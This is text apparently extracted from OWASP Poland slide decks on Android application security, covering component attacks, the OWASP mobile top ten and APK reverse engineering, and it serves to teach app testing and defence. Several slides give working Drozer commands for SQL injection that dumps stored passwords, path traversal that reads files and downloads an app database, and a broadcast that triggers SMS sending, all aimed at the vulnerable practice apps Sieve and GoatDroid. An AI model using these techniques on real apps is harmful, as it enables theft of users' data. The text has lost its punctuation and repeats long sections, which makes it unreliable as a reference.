ART VS DVMbull Android 44 ndash Experimental From android 50 - Defaultbull Ahead-of-time (AOT) compilationbull Improved garbage collectionbull Improved diagnostic detail in exceptions and crash reports
Application FrameworkActivity Manager Manages the activity life cycle of applications
Content Providers Manage the data sharing between applications
Telephony Manager Manages all voice calls
Location Manager Location management using GPS or cell tower
Resource Manager Manage the various types of resources we use in our Application
Application Layer bull SMS client appbull Dialerbull Web browserbull Contact manager
APK how itrsquos works
Android Application Security
bull Android sandbox
bull Permission labels defined in AndroidManifestxml
bull Signature
bull Install time security decisionsbull Android 60 Security release
Android 60bull Runtime Permissionsbull Verified Bootbull Hardware-Isolated Security bull Fingerprintsbull SD Card Adoptionbull Clear Text Traffic bull System Hardeningbull USB Access Control
Defense layers
Google Play
1 2 3 4 5
Require and validate
Developer information
Review Applications
before distribution
Permanently stop
distribution
Reduce attacker flexibility
Remove applications
after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps
The vast majority of installs come from Google Play
Verify AppsApps are verified prior to install
Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Android Runtimebull Core librariesbull Dalvik Virtual Machinebull DVM vs JVM Differencesbull ART
Dalvik VMbull The software that runs the apps on Android devicesbull Its fast even on weak CPUs bull it will run on systems with little memory bull it will run in an energy-efficient way bull Provides application portability and runtime consistency bull Runs optimized file format (dex) and Dalvik bytecodebull Java class jar files converted to dex at build time
ART VS DVMbull Android 44 ndash Experimental From android 50 - Defaultbull Ahead-of-time (AOT) compilationbull Improved garbage collectionbull Improved diagnostic detail in exceptions and crash reports
Application FrameworkActivity Manager Manages the activity life cycle of applications
Content Providers Manage the data sharing between applications
Telephony Manager Manages all voice calls
Location Manager Location management using GPS or cell tower
Resource Manager Manage the various types of resources we use in our Application
Application Layer bull SMS client appbull Dialerbull Web browserbull Contact manager
APK how itrsquos works
Android Application Security
bull Android sandbox
bull Permission labels defined in AndroidManifestxml
bull Signature
bull Install time security decisionsbull Android 60 Security release
Android 60bull Runtime Permissionsbull Verified Bootbull Hardware-Isolated Security bull Fingerprintsbull SD Card Adoptionbull Clear Text Traffic bull System Hardeningbull USB Access Control
Defense layers
Google Play
1 2 3 4 5
Require and validate
Developer information
Review Applications
before distribution
Permanently stop
distribution
Reduce attacker flexibility
Remove applications
after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps
The vast majority of installs come from Google Play
Verify AppsApps are verified prior to install
Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
